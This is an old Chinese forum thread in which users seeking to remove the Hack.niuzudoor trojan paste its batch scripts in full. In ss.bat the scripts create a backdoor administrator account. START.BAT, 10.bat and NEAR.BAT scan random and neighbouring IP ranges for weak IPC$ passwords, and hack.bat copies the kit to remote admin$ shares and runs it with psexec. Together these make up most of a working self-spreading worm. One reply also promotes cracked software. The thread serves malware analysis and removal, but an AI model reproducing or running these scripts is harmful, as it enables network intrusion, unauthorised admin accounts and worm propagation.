9,506
社区成员
发帖
与我相关
我的任务
分享如何手动清除Hack.niuzudoor.4372木马
在winnt/system32下自动生成ntservice.exe,ntservice.bat,ntservice.ini文件
在“服务”里有自动启动一个叫“APPLICATION”的服务,在进程表里有个ntservice的进程,金山毒霸杀了N次都杀不干净
.bat的内容是
net stop Application >A.TMP
ntservice.exe -install >>A.TMP
net start Application >>A.TMP
.ini的内容是
[Settings]
ServiceName = Application
LogEnable = 0
ProcCount = 1
[Process0]
CommandLine = "cmd.exe /C SS.bat"
PauseStart = 1000
PauseEnd = 1000
UserInterface = No
在“服务”里有自动启动一个叫“APPLICATION”的服务,在进程表里有个ntservice的进程,金山毒霸杀了N次都杀不干净
.bat的内容是
net stop Application >A.TMP
ntservice.exe -install >>A.TMP
net start Application >>A.TMP
.ini的内容是
[Settings]
ServiceName = Application
LogEnable = 0
ProcCount = 1
[Process0]
CommandLine = "cmd.exe /C SS.bat"
PauseStart = 1000
PauseEnd = 1000
UserInterface = No
...全文
请发表友善的回复…
发表回复
spgoal 2003-06-26
- 打赏
- 举报
不会吧!!
进这页??
进这页??
spgoal 2003-06-09
- 打赏
- 举报
UP,还有没更好解决办法?
hail21cn 2003-06-09
- 打赏
- 举报
扫描类型: 实时防护 扫描
事件: 已发现病毒!
病毒名称: BAT.Mumu.A.Worm
文件: E:\Temporary Internet Files\Content.IE5\UVWTOHM3\1877308[2].xml
位置:E:\Temporary Internet Files\Content.IE5\UVWTOHM3
计算机:HAIL-2M
用户:Administrator
采用的操作:清除 失败 : 隔离 失败 : 拒绝访问
发现的日期: Mon Jun 09 21:49:01 2003
事件: 已发现病毒!
病毒名称: BAT.Mumu.A.Worm
文件: E:\Temporary Internet Files\Content.IE5\UVWTOHM3\1877308[2].xml
位置:E:\Temporary Internet Files\Content.IE5\UVWTOHM3
计算机:HAIL-2M
用户:Administrator
采用的操作:清除 失败 : 隔离 失败 : 拒绝访问
发现的日期: Mon Jun 09 21:49:01 2003
hail21cn 2003-06-09
- 打赏
- 举报
我进入这里时Norton有病毒提示,是否页面里有东东?
?????????
?????????
?????????
?????????
duduxiong 2003-06-06
- 打赏
- 举报
我常去中文之家:
http://www.chinesejia.com/
感觉还不错,东东好多,内容丰富……,许多破解版的东西可以放心使用,
http://www.chinesejia.com/
感觉还不错,东东好多,内容丰富……,许多破解版的东西可以放心使用,
spgoal 2003-06-06
- 打赏
- 举报
去看看
spgoal 2003-06-05
- 打赏
- 举报
哪有最新版下载?
ggdw 2003-06-05
- 打赏
- 举报
用木马克星试试
wqb1979 2003-06-04
- 打赏
- 举报
换个用户继续帖
hack.bat文件内容
net use \\%1\ipc$ %3 /u:"%2"
copy 10.BAT \\%1\admin$\system32 /y
copy hack.bat \\%1\admin$\system32 /y
copy HFind.exe \\%1\admin$\system32 /y
copy ipc.bat \\%1\admin$\system32 /y
copy IPCPass.txt \\%1\admin$\system32 /y
copy MUMA.BAT \\%1\admin$\system32 /y
copy NWIZ_.EXE \\%1\admin$\system32 /y
copy NWIZe.IN_ \\%1\admin$\system32 /y
copy pcMsg.dll \\%1\admin$\system32 /y
copy psexec.exe \\%1\admin$\system32 /y
copy RANDOM.BAT \\%1\admin$\system32 /y
copy rep.EXE \\%1\admin$\system32 /y
copy replace.bat \\%1\admin$\system32 /y
copy START.BAT \\%1\admin$\system32 /y
copy tihuan.txt \\%1\admin$\system32 /y
copy space.txt \\%1\admin$\system32 /y
copy NEAR.BAT \\%1\admin$\system32 /y
copy ntservice.exe \\%1\admin$\system32 /y
copy NTService.ini \\%1\admin$\system32 /y
copy ntservice.bat \\%1\admin$\system32 /y
copy SS.bat \\%1\admin$\system32 /y
start /i /min /wait /B psexec \\%1 -u %2 -p %3 -d cmd.exe /c ntservice.bat
我不知道怎么清除,这些代码只能看懂一些,各位帮帮忙
hack.bat文件内容
net use \\%1\ipc$ %3 /u:"%2"
copy 10.BAT \\%1\admin$\system32 /y
copy hack.bat \\%1\admin$\system32 /y
copy HFind.exe \\%1\admin$\system32 /y
copy ipc.bat \\%1\admin$\system32 /y
copy IPCPass.txt \\%1\admin$\system32 /y
copy MUMA.BAT \\%1\admin$\system32 /y
copy NWIZ_.EXE \\%1\admin$\system32 /y
copy NWIZe.IN_ \\%1\admin$\system32 /y
copy pcMsg.dll \\%1\admin$\system32 /y
copy psexec.exe \\%1\admin$\system32 /y
copy RANDOM.BAT \\%1\admin$\system32 /y
copy rep.EXE \\%1\admin$\system32 /y
copy replace.bat \\%1\admin$\system32 /y
copy START.BAT \\%1\admin$\system32 /y
copy tihuan.txt \\%1\admin$\system32 /y
copy space.txt \\%1\admin$\system32 /y
copy NEAR.BAT \\%1\admin$\system32 /y
copy ntservice.exe \\%1\admin$\system32 /y
copy NTService.ini \\%1\admin$\system32 /y
copy ntservice.bat \\%1\admin$\system32 /y
copy SS.bat \\%1\admin$\system32 /y
start /i /min /wait /B psexec \\%1 -u %2 -p %3 -d cmd.exe /c ntservice.bat
我不知道怎么清除,这些代码只能看懂一些,各位帮帮忙
spgoal 2003-06-04
- 打赏
- 举报
10.bat文件内容
DEL IPCFIND.TXT
HFIND %IPA%.%1.1 %IPA%.%1.254 -t 254
CALL replace.BAT
CALL ipc.bat IPCFind.txt
DEL IPCFind.txt
************************************************
NEAR.BAT
IF "%NUM5%"=="SYN_SENT" GOTO END
IF EXIST "%NUM1%.%NUM2%.%NUM3%" GOTO END
IF "%NUM1%.%NUM2%.%NUM3%"=="192.168.0" GOTO END
IF "%NUM1%.%NUM2%.%NUM3%"=="127.0.0" GOTO END
PING %NUM1%.%NUM2%.%NUM3%.%NUM4% >B.TMP
PING %NUM1%.%NUM2%.%NUM3%.1 >>B.TMP
FIND /C /I "from" B.TMP
IF ERRORLEVEL 1 GOTO END
SET IPA=%NUM1%.%NUM2%
CALL 10.BAT %NUM3%
ECHO . > "%NUM1%.%NUM2%.%NUM3%"
ATTRIB "%NUM1%.%NUM2%.%NUM3%" +H
:END
***********************************************************
RANDOM.BAT
SET NUM1=%RANDOM%
SET NUM2=%RANDOM%
SET NUM3=%RANDOM%
SET NUM4=%RANDOM%
SET /A (NUM1%%=256)
SET /A (NUM2%%=256)
SET /A (NUM3%%=256)
SET /A (NUM4%%=256)
******************************************************
replace.BAT(在10.bat中调用)
@rep.exe "/[NULL]" tihuan.txt ipcfind.txt /F
@rep.exe "/" space.txt ipcfind.txt /F
**********************************************************
ipc.bat
for /f "tokens=1,2,3 delims= " %%i in (%1) do call hack.bat %%i %%j %%k
************************************************************
暂时跟踪到那么多,一执行cmd.exe /C SS.bat
在system32目录里会出现一个Hfind.exe文件,好像是个扫描器
DEL IPCFIND.TXT
HFIND %IPA%.%1.1 %IPA%.%1.254 -t 254
CALL replace.BAT
CALL ipc.bat IPCFind.txt
DEL IPCFind.txt
************************************************
NEAR.BAT
IF "%NUM5%"=="SYN_SENT" GOTO END
IF EXIST "%NUM1%.%NUM2%.%NUM3%" GOTO END
IF "%NUM1%.%NUM2%.%NUM3%"=="192.168.0" GOTO END
IF "%NUM1%.%NUM2%.%NUM3%"=="127.0.0" GOTO END
PING %NUM1%.%NUM2%.%NUM3%.%NUM4% >B.TMP
PING %NUM1%.%NUM2%.%NUM3%.1 >>B.TMP
FIND /C /I "from" B.TMP
IF ERRORLEVEL 1 GOTO END
SET IPA=%NUM1%.%NUM2%
CALL 10.BAT %NUM3%
ECHO . > "%NUM1%.%NUM2%.%NUM3%"
ATTRIB "%NUM1%.%NUM2%.%NUM3%" +H
:END
***********************************************************
RANDOM.BAT
SET NUM1=%RANDOM%
SET NUM2=%RANDOM%
SET NUM3=%RANDOM%
SET NUM4=%RANDOM%
SET /A (NUM1%%=256)
SET /A (NUM2%%=256)
SET /A (NUM3%%=256)
SET /A (NUM4%%=256)
******************************************************
replace.BAT(在10.bat中调用)
@rep.exe "/[NULL]" tihuan.txt ipcfind.txt /F
@rep.exe "/" space.txt ipcfind.txt /F
**********************************************************
ipc.bat
for /f "tokens=1,2,3 delims= " %%i in (%1) do call hack.bat %%i %%j %%k
************************************************************
暂时跟踪到那么多,一执行cmd.exe /C SS.bat
在system32目录里会出现一个Hfind.exe文件,好像是个扫描器
spgoal 2003-06-04
- 打赏
- 举报
ss.bat文件内容
net user admin KKKKKKK /add
net user admin KKKKKKK
net localgroup administrators admin /add
start /i /min /wait /B psexec \\127.0.0.1 -u admin -p "KKKKKKK" -d cmd.exe /c START.BAT
*************************************************************************
START.BAT的内容
CALL MUMA.BAT
SET IPA=192.168
CALL 10.BAT 0
:NEARAGAIN
netstat -n|find ":" >A.TMP
FOR /F "tokens=7,8,9,10,12 delims=.: " %%I IN (A.TMP) DO SET NUM1=%%I&& SET NUM2=%%J&& SET NUM3=%%K&& SET NUM4=%%L&& SET NUM5=%%M&& CALL NEAR.BAT
:START
CALL RANDOM.BAT
IF "%NUM1%"=="255" GOTO NEARAGAIN
IF "%NUM1%"=="192" GOTO NEARAGAIN
IF "%NUM1%"=="127" GOTO NEARAGAIN
IF "%NUM2%"=="255" GOTO NEARAGAIN
IF "%NUM3%"=="255" GOTO NEARAGAIN
IF "%NUM4%"=="255" GOTO NEARAGAIN
REM =========================================
SET IPA=%NUM1%.%NUM2%
ECHO START > A.LOG
PING %IPA%.%NUM3%.1>B.TMP
PING %IPA%.%NUM3%.%NUM4%>>B.TMP
FIND /C /I "from" B.TMP
IF ERRORLEVEL 1 GOTO START
CALL 10.BAT %NUM3%
DEL A.LOG
GOTO START
net user admin KKKKKKK /add
net user admin KKKKKKK
net localgroup administrators admin /add
start /i /min /wait /B psexec \\127.0.0.1 -u admin -p "KKKKKKK" -d cmd.exe /c START.BAT
*************************************************************************
START.BAT的内容
CALL MUMA.BAT
SET IPA=192.168
CALL 10.BAT 0
:NEARAGAIN
netstat -n|find ":" >A.TMP
FOR /F "tokens=7,8,9,10,12 delims=.: " %%I IN (A.TMP) DO SET NUM1=%%I&& SET NUM2=%%J&& SET NUM3=%%K&& SET NUM4=%%L&& SET NUM5=%%M&& CALL NEAR.BAT
:START
CALL RANDOM.BAT
IF "%NUM1%"=="255" GOTO NEARAGAIN
IF "%NUM1%"=="192" GOTO NEARAGAIN
IF "%NUM1%"=="127" GOTO NEARAGAIN
IF "%NUM2%"=="255" GOTO NEARAGAIN
IF "%NUM3%"=="255" GOTO NEARAGAIN
IF "%NUM4%"=="255" GOTO NEARAGAIN
REM =========================================
SET IPA=%NUM1%.%NUM2%
ECHO START > A.LOG
PING %IPA%.%NUM3%.1>B.TMP
PING %IPA%.%NUM3%.%NUM4%>>B.TMP
FIND /C /I "from" B.TMP
IF ERRORLEVEL 1 GOTO START
CALL 10.BAT %NUM3%
DEL A.LOG
GOTO START
